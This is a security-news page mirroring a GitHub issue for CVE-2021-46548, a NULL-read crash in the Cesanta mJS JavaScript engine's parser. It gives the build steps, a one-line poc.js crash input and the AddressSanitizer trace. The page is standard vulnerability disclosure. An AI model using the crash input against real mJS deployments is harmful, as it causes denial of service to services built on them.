Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-46548: SEGV src/mjs_bcode.c:15 in add_lineno_map_item · Issue #228 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via add_lineno_map_item at src/mjs_bcode.c. This vulnerability can lead to a Denial of Service (DoS).

CVE
Open in Source
#vulnerability#ubuntu#linux#dos#js#git

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

Comments

@hope-fly

mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)

save the makefile then make

make

Test casepoc.js

(JSON.stringify([1, 2, 3]))(((print-6.32*(823))-6.32*21e2)(JSON.parse(JSON.stringify([(0)]))));J

Execution steps & Output

$ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==82386==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000000e4 (pc 0x55a4aeab6fd4 bp 0x00000000008c sp 0x7ffc17a28520 T0) ==82386==The signal is caused by a READ memory access. ==82386==Hint: address points to the zero page. #0 0x55a4aeab6fd3 in add_lineno_map_item src/mjs_bcode.c:15 #1 0x55a4aeab6fd3 in emit_int src/mjs_bcode.c:47 #2 0x55a4aeb600dd in parse_comparison src/mjs_parser.c:431 #3 0x55a4aeb600dd in parse_equality src/mjs_parser.c:435 #4 0x55a4aeb65d0b in parse_bitwise_and src/mjs_parser.c:440 #5 0x55a4aeb65d0b in parse_bitwise_xor src/mjs_parser.c:445 #6 0x55a4aeb32177 in parse_bitwise_or src/mjs_parser.c:450 #7 0x55a4aeb32177 in parse_logical_and src/mjs_parser.c:455 #8 0x55a4aeb32177 in parse_logical_or src/mjs_parser.c:460 #9 0x55a4aeb32177 in parse_ternary src/mjs_parser.c:465 #10 0x55a4aeb32177 in parse_assignment src/mjs_parser.c:503 #11 0x55a4aeb388d7 in parse_expr src/mjs_parser.c:507 #12 0x55a4aeb388d7 in parse_statement src/mjs_parser.c:945

AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_bcode.c:15 in add_lineno_map_item ==82386==ABORTING

Credits: Found by OWL337 team.

1 participant

@hope-fly

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE